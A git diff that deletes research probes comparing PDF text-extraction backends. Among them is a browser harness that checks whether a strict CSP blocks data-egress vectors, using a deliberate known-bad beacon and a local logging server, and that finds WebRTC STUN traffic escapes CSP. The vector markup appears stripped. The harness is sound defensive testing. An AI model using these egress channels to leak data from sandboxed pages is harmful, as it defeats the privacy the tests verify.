pdfium.FPDF_LoadMemDocument(dataPtr, data.length, ""); -const page = pdfium.FPDF_LoadPage(doc, pageIdx); -const tp = pdfium.FPDFText_LoadPage(page); -const n = pdfium.FPDFText_CountChars(tp); - -const boxPtr = pdfium.pdfium.wasmExports.malloc(32); -const matPtr = pdfium.pdfium.wasmExports.malloc(24); -const oxPtr = pdfium.pdfium.wasmExports.malloc(16); -const namePtr = pdfium.pdfium.wasmExports.malloc(256); -const flagsPtr = pdfium.pdfium.wasmExports.malloc(4); - -// Whether each call ever returned a non-trivial answer. A function that is exported but -// always fails would otherwise read as "available" while supplying nothing. -const exercised = { charbox: 0, matrix: 0, origin: 0, generated: 0, hyphen: 0, fontinfo: 0, maperror: 0 }; -const chars = []; -for (let i = 0; i < n; i++) { - const cp = pdfium.FPDFText_GetUnicode(tp, i); - const gen = pdfium.FPDFText_IsGenerated(tp, i); - const hyp = pdfium.FPDFText_IsHyphen(tp, i); - const mapErr = pdfium.FPDFText_HasUnicodeMapError(tp, i); - if (gen === 1) exercised.generated++; - if (hyp === 1) exercised.hyphen++; - if (mapErr === 1) exercised.maperror++; - - const okBox = pdfium.FPDFText_GetCharBox(tp, i, boxPtr, boxPtr + 8, boxPtr + 16, boxPtr + 24); - if (okBox) exercised.charbox++; - const okOrigin = pdfium.FPDFText_GetCharOrigin(tp, i, oxPtr, oxPtr + 8); - if (okOrigin) exercised.origin++; - const okMat = pdfium.FPDFText_GetMatrix(tp, i, matPtr); - if (okMat) exercised.matrix++; - const nameLen = pdfium.FPDFText_GetFontInfo(tp, i, namePtr, 256, flagsPtr); - if (nameLen > 0) exercised.fontinfo++; - - chars.push([ - cp, - gen, - hyp, - mapErr, - okOrigin ? r4(pdfium.pdfium.getValue(oxPtr, "double")) : null, - okOrigin ? r4(pdfium.pdfium.getValue(oxPtr + 8, "double")) : null, - okBox ? r4(pdfium.pdfium.getValue(boxPtr, "double")) : null, - okBox ? r4(pdfium.pdfium.getValue(boxPtr + 8, "double")) : null, - okMat ? r4(pdfium.FPDFText_GetFontSize(tp, i) * Math.hypot(pdfium.pdfium.getValue(matPtr, "float"), pdfium.pdfium.getValue(matPtr + 4, "float"))) : null, - nameLen > 0 ? pdfium.pdfium.UTF8ToString(namePtr) : "", - pdfium.FPDFText_GetTextIndexFromCharIndex(tp, i), - ]); -} - -process.stdout.write( - JSON.stringify({ - wrapper_version: JSON.parse( - readFileSync(require.resolve("@embedpdf/pdfium/pdfium.wasm").replace(/dist[/\\]pdfium\.wasm$/, "package.json")), - ).version, - entry_points_present: present, - all_present: Object.values(present).every(Boolean), - page: pageIdx + 1, - count_chars: n, - exercised, - chars, - }), -); - -pdfium.FPDFText_ClosePage(tp); -pdfium.FPDF_ClosePage(page); -pdfium.FPDF_CloseDocument(doc); - -function r4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/nocsp.html b/docs/research/pdf-backend-bakeoff/probes/nocsp.html deleted file mode 100644 index 6e2dd20f..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/nocsp.html +++ /dev/null @@ -1,3 +0,0 @@ -no CSP
running
- - diff --git a/docs/research/pdf-backend-bakeoff/probes/phase0_speed.py b/docs/research/pdf-backend-bakeoff/probes/phase0_speed.py deleted file mode 100644 index 439dc7ce..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/phase0_speed.py +++ /dev/null @@ -1,122 +0,0 @@ -"""Phase 0 gate 4: pdfminer.six speed on the largest corpus bills, vs the PDFium incumbent. - -The spec's kill condition: "if one document takes tens of seconds it is out on Phase 5 -grounds". Native timing is the floor; Pyodide adds the measured 1.6x-1.9x WASM penalty on -top, so a native number is multiplied by that band before comparing against the gate. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/phase0_speed.py -""" - -from __future__ import annotations - -import sys -import time -from pathlib import Path - -REPO = Path(__file__).resolve().parents[4] -sys.path.insert(0, str(REPO / "src")) - -WASM_PENALTY = (1.6, 1.9) # measured in the delivery spike - - -def page_count(path: Path) -> int: - import pypdfium2 as pdfium - - doc = pdfium.PdfDocument(str(path)) - try: - return len(doc) - finally: - doc.close() - - -def time_pdfium(path: Path, limit: int | None = None) -> tuple[float, int, int]: - """Full incumbent extraction (glyph sidecar included) over `limit` pages.""" - import ctypes - import math - - import pypdfium2 as pdfium - import pypdfium2.raw as raw_api - - doc = pdfium.PdfDocument(str(path)) - n_pages = len(doc) if limit is None else min(limit, len(doc)) - glyphs = 0 - t0 = time.perf_counter() - try: - for i in range(n_pages): - page = doc[i] - tp = page.get_textpage() - try: - text = tp.get_text_range() - n = raw_api.FPDFText_CountChars(tp.raw) - glyphs += max(n, 0) - for j in range(max(n, 0)): - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - if not raw_api.FPDFText_GetCharBox( - tp.raw, - j, - ctypes.byref(left), - ctypes.byref(right), - ctypes.byref(bottom), - ctypes.byref(top), - ): - continue - mat = raw_api.FS_MATRIX() - if not raw_api.FPDFText_GetMatrix(tp.raw, j, ctypes.byref(mat)): - continue - math.sqrt(mat.a * mat.a + mat.b * mat.b) - _ = text - finally: - tp.close() - page.close() - finally: - doc.close() - return time.perf_counter() - t0, n_pages, glyphs - - -def time_pdfminer(path: Path, limit: int | None = None) -> tuple[float, int, int]: - from pdfminer.high_level import extract_pages - from pdfminer.layout import LAParams, LTChar - - glyphs = 0 - pages = 0 - t0 = time.perf_counter() - # laparams=None disables layout analysis (the part ADR 0002 rejected); we only want - # glyph facts, so this is both faster and the honest configuration for this bake-off. - for layout in extract_pages(str(path), laparams=LAParams()): - pages += 1 - stack = list(layout) - while stack: - obj = stack.pop() - if isinstance(obj, LTChar): - glyphs += 1 - elif hasattr(obj, "__iter__"): - stack.extend(obj) - if limit is not None and pages >= limit: - break - return time.perf_counter() - t0, pages, glyphs - - -def main() -> None: - corpus = REPO / "tests" / "corpus" - pdfs = sorted(corpus.glob("*/*.pdf"), key=lambda p: -p.stat().st_size) - sample = int(sys.argv[1]) if len(sys.argv) > 1 else 25 - - print(f"{'document':<48} {'pages':>6} {'pdfium_s':>9} {'pdfminer_s':>11} {'ratio':>7}") - for pdf in pdfs[:3]: - total = page_count(pdf) - t_incumbent, n, g_i = time_pdfium(pdf, sample) - t_challenger, n2, g_m = time_pdfminer(pdf, sample) - label = f"{pdf.parent.name}/{pdf.name}" - ratio = t_challenger / t_incumbent if t_incumbent else float("inf") - print(f"{label:<48} {total:>6} {t_incumbent:>9.2f} {t_challenger:>11.2f} {ratio:>6.1f}x") - print( - f" sampled {n}/{n2} pages; glyphs pdfium={g_i} pdfminer={g_m}; " - f"projected full doc: pdfium {t_incumbent / n * total:.1f}s " - f"pdfminer {t_challenger / n2 * total:.1f}s " - f"(pyodide {t_challenger / n2 * total * WASM_PENALTY[0]:.0f}-" - f"{t_challenger / n2 * total * WASM_PENALTY[1]:.0f}s)" - ) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/phase4_egress.py b/docs/research/pdf-backend-bakeoff/probes/phase4_egress.py deleted file mode 100644 index 4b5f1772..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/phase4_egress.py +++ /dev/null @@ -1,296 +0,0 @@ -"""Phase 4: zero-egress proof, built to fail. - -Asserting an absence is the vacuous-pass case: a request counter reading zero looks -identical whether the guard works or the counter is broken. So this harness is judged by -whether it can CATCH a request, and that is tested explicitly rather than assumed. - -Four parts, all required: - - 1. `no-csp control` -- the same vectors with NO CSP. Any vector the browser permits - MUST be observed. This proves the harness can see egress at - all, and it is run FIRST: if it observes nothing, every later - zero is meaningless and the run aborts. - 2. `strict CSP` -- the production policy. Every vector attempted; assert the - server received nothing and the CDP request count is zero. - 3. `known-bad build` -- a page carrying the strict CSP but ALSO one deliberately - permitted beacon. The harness must catch it. Without this the - zero-egress claim is unfalsifiable. - 4. `severed network` -- all routes aborted; confirm the page still WORKS. This is the - inert form: if the build needed the network it fails closed - rather than leaking. - -Observation is at the NETWORK layer (the logging server plus CDP request events), never -at the JS layer. Under CSP most vectors report `attempted` with no exception and simply -produce no request, so a probe keyed on thrown errors would report exfiltration as -succeeding. - -Run (the server is started and stopped by this script): - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/phase4_egress.py \ - --out docs/research/pdf-backend-bakeoff/results/phase4.json -""" - -from __future__ import annotations - -import argparse -import json -import subprocess -import sys -import threading -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] - -PORT = 8973 -SETTLE_S = 4.0 - -STRICT_CSP = ( - "default-src 'none'; script-src 'self' 'unsafe-inline'; style-src 'unsafe-inline'; " - "img-src data:; connect-src 'none'; form-action 'none'; base-uri 'none'; " - "object-src 'none'; frame-src 'none'; worker-src 'none'" -) - -PAGE = """{title} -{csp} -
running
- -{extra} - -""" - -# The known-bad control's deliberate leak. It sits INSIDE the strict-CSP page, so the -# only thing distinguishing it from part 2 is one permitted destination -- which is -# exactly the discrimination the harness must be able to make. -KNOWN_BAD_EXTRA = f"""""" -KNOWN_BAD_CSP = ( - f'" -) - - -class Server: - """The logging server, run as a subprocess so its listeners are really separate.""" - - def __init__(self, dump: Path): - self.dump = dump - self.proc: subprocess.Popen | None = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "600"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(50): - if any("listening" in ln for ln in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("logging server did not start") - - def _drain(self): - assert self.proc and self.proc.stdout - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_exc): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - def observed_since(self, mark: int) -> list[str]: - return [ln.strip() for ln in self.lines[mark:] if "EGRESS OBSERVED" in ln] - - @property - def mark(self) -> int: - return len(self.lines) - - -def write_page(path: Path, title: str, tag: str, csp: str, extra: str = "") -> None: - path.write_text(PAGE.format(title=title, tag=tag, csp=csp, extra=extra)) - - -def run_case(browser, server: Server, page_path: Path, tag: str, offline: bool = False) -> dict: - """Load one fixture from file://, run every vector, report page + network views.""" - context = browser.new_context() - cdp_requests: list[str] = [] - context.on("request", lambda r: cdp_requests.append(f"{r.method} {r.url}")) - if offline: - # Sever the NETWORK, not the filesystem. Aborting `**` also kills the fixture's - # own file:// load, so the page never runs and the test passes for the wrong - # reason -- it would report "no egress" from a page that never executed. Only - # network schemes are aborted; reading the local artifact off disk is not egress. - context.route( - lambda url: url.startswith(("http://", "https://", "ws://", "wss://")), - lambda route: route.abort(), - ) - page = context.new_page() - mark = server.mark - page.goto(page_path.as_uri()) - # Polled from Python rather than with `page.wait_for_function`. Playwright's polling - # helper compiles a function in the page, which needs `unsafe-eval`; the strict CSP - # denies it, so wait_for_function times out on a page that in fact ran every vector - # to completion. That failure mode is dangerous rather than merely annoying: it makes - # a fully-executed run look stalled, and a stalled run's zero hits look like a pass. - page_report = "" - deadline = time.time() + 30 - while time.time() < deadline: - try: - page_report = page.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - element not present yet - page_report = "" - if "DONE" in page_report: - break - time.sleep(0.25) - time.sleep(SETTLE_S) # let late loads (webfont, worker, STUN) arrive - context.close() - - # Requests aimed at the logging host, as seen by CDP. file:// asset loads for the - # fixture itself are not egress and are excluded by host. - external = [r for r in cdp_requests if f"127.0.0.1:{PORT}" in r] - observed = server.observed_since(mark) - return { - "tag": tag, - # What the SERVER received. This alone decides the claim. - "server_observed": observed, - "server_http_hits": [ln for ln in observed if "[http]" in ln], - "server_stun_hits": [ln for ln in observed if "[stun]" in ln or "[udp]" in ln], - # What CDP saw the browser CREATE. A request object exists before CSP rules on - # it, so these are ATTEMPTS, not egress: under the strict policy this list is - # non-empty while the server receives nothing. Reported to keep the distinction - # visible rather than to prove anything. - "cdp_attempted_requests": external, - "page_report": page_report, - # Fail closed: a run that did not finish proves nothing, and its zero hits must - # never be read as a pass. - "vectors_completed": "DONE" in page_report, - "n_vectors_run": page_report.count(":attempted") + page_report.count(":threw"), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fixtures = PROBES / "egress-fixtures" - fixtures.mkdir(exist_ok=True) - (fixtures / "vectors.js").write_text((PROBES / "vectors.js").read_text()) - - write_page(fixtures / "nocsp.html", "no CSP", "nocsp", "") - write_page( - fixtures / "withcsp.html", - "strict CSP", - "withcsp", - f'', - ) - write_page(fixtures / "knownbad.html", "known-bad control", "knownbad", KNOWN_BAD_CSP, KNOWN_BAD_EXTRA) - - results: dict = {"port": PORT, "strict_csp": STRICT_CSP, "cases": {}} - args.out.parent.mkdir(parents=True, exist_ok=True) - - with Server(fixtures / "hits.json") as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - # PART 1 -- prove the harness can see egress at all, before trusting any zero. - control = run_case(browser, server, fixtures / "nocsp.html", "nocsp") - results["cases"]["1_no_csp_control"] = control - print( - f"1. no-CSP control: {len(control['server_http_hits'])} http + " - f"{len(control['server_stun_hits'])} stun at server; " - f"{control['n_vectors_run']} vectors ran (completed={control['vectors_completed']})", - flush=True, - ) - if not control["server_observed"]: - results["ABORTED"] = ( - "The no-CSP control observed ZERO egress. The harness cannot see a " - "request, so every later zero would be vacuous. Nothing below is " - "evidence of anything." - ) - args.out.write_text(json.dumps(results, indent=1)) - print(results["ABORTED"], file=sys.stderr) - return - - # PART 2 -- the production policy. - strict = run_case(browser, server, fixtures / "withcsp.html", "withcsp") - results["cases"]["2_strict_csp"] = strict - print( - f"2. strict CSP: {len(strict['server_http_hits'])} http + " - f"{len(strict['server_stun_hits'])} stun at server; " - f"{strict['n_vectors_run']} vectors ran (completed={strict['vectors_completed']}); " - f"{len(strict['cdp_attempted_requests'])} attempts created but blocked", - flush=True, - ) - - # PART 3 -- known-bad control. The harness MUST catch this one. - bad = run_case(browser, server, fixtures / "knownbad.html", "knownbad") - results["cases"]["3_known_bad"] = bad - caught = any("knownbad-beacon" in ln for ln in bad["server_observed"]) - results["known_bad_caught"] = caught - print( - f"3. known-bad: {len(bad['server_http_hits'])} http at server; " - f"deliberate beacon caught = {caught}", - flush=True, - ) - - # PART 4 -- severed network. The page must still complete. - offline = run_case(browser, server, fixtures / "withcsp.html", "offline", offline=True) - results["cases"]["4_severed_network"] = offline - print( - f"4. severed net: page completed = {offline['vectors_completed']} " - f"({offline['n_vectors_run']} vectors); " - f"{len(offline['server_http_hits'])} http at server", - flush=True, - ) - finally: - browser.close() - - strict_case = results["cases"].get("2_strict_csp", {}) - control_case = results["cases"]["1_no_csp_control"] - results["verdict"] = { - # The harness is only trustworthy if it has been SEEN to catch a request, twice: - # once with no policy at all, once with a policy plus a deliberate leak. - "harness_can_detect_egress": bool(control_case["server_http_hits"]), - "harness_can_detect_udp": bool(control_case["server_stun_hits"]), - "known_bad_caught": results.get("known_bad_caught", False), - # Fail closed: a run that did not execute its vectors proves nothing, and its - # zero hits must never be read as a pass. - "strict_run_completed": strict_case.get("vectors_completed", False), - "strict_vectors_run": strict_case.get("n_vectors_run", 0), - "strict_csp_http_hits": len(strict_case.get("server_http_hits", [])), - "strict_csp_udp_hits": len(strict_case.get("server_stun_hits", [])), - "offline_run_completed": results["cases"] - .get("4_severed_network", {}) - .get("vectors_completed", False), - # The claim, scoped to what CSP actually governs. - "csp_blocks_every_subresource_vector": bool( - strict_case.get("vectors_completed") and not strict_case.get("server_http_hits") - ), - # ... and the channel it does NOT govern, named rather than omitted. - "webrtc_egress_survives_csp": bool(strict_case.get("server_stun_hits")), - } - results["verdict"]["zero_egress_claim_earned"] = bool( - results["verdict"]["harness_can_detect_egress"] - and results["verdict"]["known_bad_caught"] - and results["verdict"]["strict_run_completed"] - and results["verdict"]["csp_blocks_every_subresource_vector"] - ) - args.out.write_text(json.dumps(results, indent=1)) - print(json.dumps(results["verdict"], indent=1), flush=True) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py b/docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py deleted file mode 100644 index 0b084bb0..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py +++ /dev/null @@ -1,200 +0,0 @@ -"""Phase 4 follow-up: is the WebRTC channel that survives CSP actually closable? - -The main harness found that a strict CSP blocks all fourteen subresource vectors and does -NOT block WebRTC: five STUN binding requests reached the logging server. CSP has no -directive governing ICE, so this is a policy gap rather than a misconfiguration, and -reporting it without testing a mitigation would leave the delivery decision no better off. - -Three candidate mitigations, measured rather than assumed: - - A. sandboxed iframe -- run the engine inside ` -""" - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "300"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(50): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - @property - def mark(self): - return len(self.lines) - - def stun_since(self, mark: int) -> list[str]: - return [x for x in self.lines[mark:] if "[stun]" in x or "[udp]" in x] - - @staticmethod - def source_ports(hits: list[str]) -> set[str]: - """Distinct UDP source ports in a set of hits. - - Load-bearing for the comparison: STUN retransmits, so N datagrams may be one - connection retrying. If every variant reported the same source port, they would - be one attempt counted three times rather than three independent attempts, and - the whole comparison would be void. - """ - return {h.rsplit(":", 1)[-1].strip() for h in hits} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=None) - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - (fx / "child.html").write_text(CHILD % {"port": PORT}) - - variants = { - "C_baseline_no_sandbox": { - "csp": f'', - "sandbox": "", - }, - "A_sandbox_allow_scripts": { - "csp": f'', - "sandbox": 'sandbox="allow-scripts"', - }, - "B_permissions_policy": { - "csp": f'', - "sandbox": "allow=\"camera 'none'; microphone 'none'; display-capture 'none'\"", - }, - } - - results: dict = {"variants": {}} - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - for name, cfg in variants.items(): - (fx / f"parent_{name}.html").write_text( - PARENT % {"title": name, "csp": cfg["csp"], "sandbox": cfg["sandbox"]} - ) - ctx = browser.new_context() - page = ctx.new_page() - mark = server.mark - page.goto((fx / f"parent_{name}.html").as_uri()) - report = "" - deadline = time.time() + 20 - while time.time() < deadline: - for frame in page.frames: - if frame == page.main_frame: - continue - try: - report = frame.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - child not ready yet - continue - if "DONE" in report: - break - time.sleep(0.25) - time.sleep(3) - stun = server.stun_since(mark) - ctx.close() - ports = Server.source_ports(stun) - results["variants"][name] = { - "sandbox_attr": cfg["sandbox"], - "stun_datagrams": len(stun), - "stun_source_ports": sorted(ports), - "webrtc_blocked": len(stun) == 0, - "child_ran": "DONE" in report, - "child_report": report.replace("\n", " | ")[:200], - } - print( - f"{name:<26} stun={len(stun):2d} ports={sorted(ports)} " - f"blocked={len(stun) == 0} child_ran={'DONE' in report} :: {report.replace(chr(10), ' | ')[:80]}", - flush=True, - ) - browser.close() - - print(json.dumps(results, indent=1)) - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py b/docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py deleted file mode 100644 index a3b9f585..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py +++ /dev/null @@ -1,206 +0,0 @@ -"""Which candidate backends can satisfy the hybrid contract, and how do they mark a -synthesised space? - -This exists because the first draft of the portability assessment asserted, from the -shape of each library's API, that the hybrid contract would narrow the candidate set. The -assertion was wrong on the first backend checked, so the question is measured instead. - -Two things are asked of each backend, on a boundary the glyph seam is known to lose -(`NATIONAL CEMETERY ADMINISTRATION`, where the gap is 2.40 pt against a 3.50 pt threshold): - - 1. Does the backend's OWN text output carry the word space? This is the half of the - hybrid contract that fixes the defect. - 2. What form does the synthesised character take, and is it distinguishable from a - space read out of the content stream? This is what decides whether an adapter can - avoid consuming placeholder geometry. - -Reported per backend rather than pooled: the answers differ in kind, not in degree, and a -single "supported / unsupported" column would hide that. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py -""" - -from __future__ import annotations - -import argparse -import ctypes -import json -import subprocess -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -PROBE_TEXT = "CEMETERY ADMINISTRATION" -PROBE_JOINED = PROBE_TEXT.replace(" ", "") - - -def probe_pdfium(pdf: Path, page: int) -> dict: - import pypdfium2 as pdfium - import pypdfium2.raw as R - - doc = pdfium.PdfDocument(str(pdf)) - try: - pg = doc[page - 1] - tp = pg.get_textpage() - raw = tp.raw - n = R.FPDFText_CountChars(raw) - seq = "".join(chr(R.FPDFText_GetUnicode(raw, i)) for i in range(n)) - k = seq.find(PROBE_TEXT) - marker = None - if k >= 0: - i = k + PROBE_TEXT.index(" ") - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - R.FPDFText_GetCharBox(raw, i, *(ctypes.byref(v) for v in (left, right, bottom, top))) - marker = { - "generated_flag": R.FPDFText_IsGenerated(raw, i) == 1, - "box_area": round((right.value - left.value) * (top.value - bottom.value), 6), - } - tp.close() - pg.close() - finally: - doc.close() - return { - "recovers_space": k >= 0, - "produces_joined_form": PROBE_JOINED in seq, - "generated_marker": "FPDFText_IsGenerated flag; zero-area box, origin only", - "detail": marker, - } - - -def probe_pdfminer(pdf: Path, page: int) -> dict: - from pdfminer.high_level import extract_pages - from pdfminer.layout import LAParams, LTAnno, LTChar - - def walk(o): - for c in getattr(o, "_objs", []): - yield c - yield from walk(c) - - pg = next(iter(extract_pages(str(pdf), page_numbers=[page - 1], laparams=LAParams()))) - seq_objs = [o for o in walk(pg) if isinstance(o, (LTChar, LTAnno))] - seq = "".join(o.get_text() for o in seq_objs) - k = seq.find(PROBE_TEXT) - marker = None - if k >= 0: - o = seq_objs[k + PROBE_TEXT.index(" ")] - marker = {"class": type(o).__name__, "has_bbox": hasattr(o, "bbox")} - return { - "recovers_space": k >= 0, - "produces_joined_form": PROBE_JOINED in seq, - "generated_marker": "LTAnno object (distinct class, carries no bbox at all)", - "detail": marker, - } - - -def probe_pymupdf(pdf: Path, page: int) -> dict: - import pymupdf - - d = pymupdf.open(str(pdf)) - try: - raw = d[page - 1].get_text("rawdict") - chars = [c for b in raw["blocks"] for ln in b.get("lines", []) for s in ln.get("spans", []) for c in s["chars"]] - seq = "".join(c["c"] for c in chars) - k = seq.find(PROBE_TEXT) - marker = None - if k >= 0: - c = chars[k + PROBE_TEXT.index(" ")] - x0, y0, x1, y1 = c["bbox"] - marker = {"box_area": round((x1 - x0) * (y1 - y0), 4)} - finally: - d.close() - return { - "recovers_space": k >= 0, - "produces_joined_form": PROBE_JOINED in seq, - "generated_marker": "NONE - synthesised spaces get a real box and are indistinguishable", - "detail": marker, - } - - -_PDFJS = """ -import { readFileSync } from "node:fs"; -const pdfjs = await import("pdfjs-dist/legacy/build/pdf.mjs"); -const doc = await pdfjs.getDocument({ data: new Uint8Array(readFileSync(process.argv[2])) }).promise; -const tc = await (await doc.getPage(parseInt(process.argv[3], 10))).getTextContent(); -const joined = tc.items.map(i => i.str).join(""); -let opp = 0, lost = 0; -for (let i = 1; i < tc.items.length; i++) { - const a = tc.items[i-1], b = tc.items[i]; - if (!a.str || !b.str || a.hasEOL || a.fontName === b.fontName) continue; - if (Math.abs(a.transform[5] - b.transform[5]) > 0.6) continue; - opp++; - if (!a.str.endsWith(" ") && !b.str.startsWith(" ") && b.transform[4] - (a.transform[4] + a.width) > 1.0) lost++; -} -console.log(JSON.stringify({ items: tc.items.length, chars_per_item: +(joined.length/tc.items.length).toFixed(1), - recovers_space: joined.includes(process.argv[4]), produces_joined_form: joined.includes(process.argv[5]), - font_boundary_adjacencies: opp, font_boundary_spaces_lost: lost })); -""" - - -def probe_pdfjs(pdf: Path, page: int) -> dict: - script = PROBES / "js" / "_probe_backend_spacing.mjs" - script.write_text(_PDFJS) - try: - r = subprocess.run( - ["node", str(script), str(pdf.resolve()), str(page), PROBE_TEXT, PROBE_JOINED], - capture_output=True, - text=True, - cwd=str(script.parent), - ) - if r.returncode != 0: - return {"error": r.stderr[-400:]} - d = json.loads(r.stdout.strip().splitlines()[-1]) - finally: - script.unlink(missing_ok=True) - return { - "recovers_space": d["recovers_space"], - "produces_joined_form": d["produces_joined_form"], - "generated_marker": "NONE - text-item granularity, no per-character box at all", - "detail": d, - } - - -BACKENDS = { - "pdfium": probe_pdfium, - "pdfminer.six": probe_pdfminer, - "pymupdf": probe_pymupdf, - "pdf.js": probe_pdfjs, -} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--pdf", type=Path, default=REPO / "tests/corpus/114-hr-2029/4_reported-in-senate.pdf") - ap.add_argument("--page", type=int, default=99) - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - out = {"pdf": str(args.pdf.relative_to(REPO)), "page": args.page, "probe_text": PROBE_TEXT, "backends": {}} - print(f"# {PROBE_TEXT!r} on {args.pdf.name} page {args.page}") - print(f" (the neutral glyph layer produces {PROBE_JOINED!r} here from PDFium's geometry)\n") - for name, fn in BACKENDS.items(): - try: - out["backends"][name] = fn(args.pdf, args.page) - except Exception as exc: # noqa: BLE001 - out["backends"][name] = {"error": f"{type(exc).__name__}: {exc}"} - r = out["backends"][name] - print( - f" {name:<14} own text keeps the space: {str(r.get('recovers_space')):<5} " - f"joined form present: {str(r.get('produces_joined_form')):<5}" - ) - print(f" synthesised-char marker: {r.get('generated_marker', r.get('error'))}") - if r.get("detail"): - print(f" {r['detail']}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_charstream.py b/docs/research/pdf-backend-bakeoff/probes/probe_charstream.py deleted file mode 100644 index 50c5f0f9..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_charstream.py +++ /dev/null @@ -1,193 +0,0 @@ -"""Probe: dump PDFium's text-page CHARACTER STREAM with per-index geometry and font. - -The research question this exists to settle: is PDFium's own indexed character stream --- the one `FPDFText_GetText` / `get_text_range()` returns, including the spaces PDFium -GENERATES rather than reads from the content stream -- addressable by the same char -index that `FPDFText_GetCharBox` / `GetMatrix` / `GetFontSize` / `GetFontInfo` take? - -If yes, a backend adapter can hand DeltaTrack an ordered stream that already carries -PDFium's word-spacing, hyphenation and reading-order decisions, WITH geometry attached, -instead of DeltaTrack re-deriving those from raw glyph positions. - -Emits, per char index: - index -> unicode -> generated? -> hyphen? -> unicode-map-error? - -> charbox / loose charbox / origin -> font size (raw and matrix-scaled) - -> font name + flags + weight -> text index - -Nothing in `src/deltatrack` is imported or modified. Read-only. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_charstream.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --page 9 --grep FAMILY -""" - -from __future__ import annotations - -import argparse -import ctypes -import json -import math -import sys -from pathlib import Path - -import pypdfium2 as pdfium -import pypdfium2.raw as R - -_FONT_BUF = 256 - - -def _tri(v: int) -> bool | None: - """FPDFText_IsGenerated / IsHyphen / HasUnicodeMapError return 1 / 0 / -1.""" - return None if v < 0 else bool(v) - - -def char_records(textpage, page_obj) -> tuple[list[dict], dict]: - raw = textpage.raw - n = R.FPDFText_CountChars(raw) - buf = (ctypes.c_char * _FONT_BUF)() - flags = ctypes.c_int() - recs: list[dict] = [] - for i in range(max(n, 0)): - cp = R.FPDFText_GetUnicode(raw, i) - - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - has_box = bool( - R.FPDFText_GetCharBox( - raw, i, ctypes.byref(left), ctypes.byref(right), ctypes.byref(bottom), ctypes.byref(top) - ) - ) - lb = R.FS_RECTF() - has_loose = bool(R.FPDFText_GetLooseCharBox(raw, i, ctypes.byref(lb))) - ox, oy = ctypes.c_double(), ctypes.c_double() - has_origin = bool(R.FPDFText_GetCharOrigin(raw, i, ctypes.byref(ox), ctypes.byref(oy))) - mat = R.FS_MATRIX() - has_matrix = bool(R.FPDFText_GetMatrix(raw, i, ctypes.byref(mat))) - - fs = R.FPDFText_GetFontSize(raw, i) - scale = math.sqrt(mat.a * mat.a + mat.b * mat.b) if has_matrix else float("nan") - - nlen = R.FPDFText_GetFontInfo(raw, i, buf, _FONT_BUF, ctypes.byref(flags)) - font = bytes(buf[: max(nlen - 1, 0)]).decode("utf-8", "replace") if nlen > 0 else "" - - recs.append( - { - "i": i, - "cp": cp, - "ch": chr(cp) if cp else "", - "generated": _tri(R.FPDFText_IsGenerated(raw, i)), - "hyphen": _tri(R.FPDFText_IsHyphen(raw, i)), - "map_error": _tri(R.FPDFText_HasUnicodeMapError(raw, i)), - 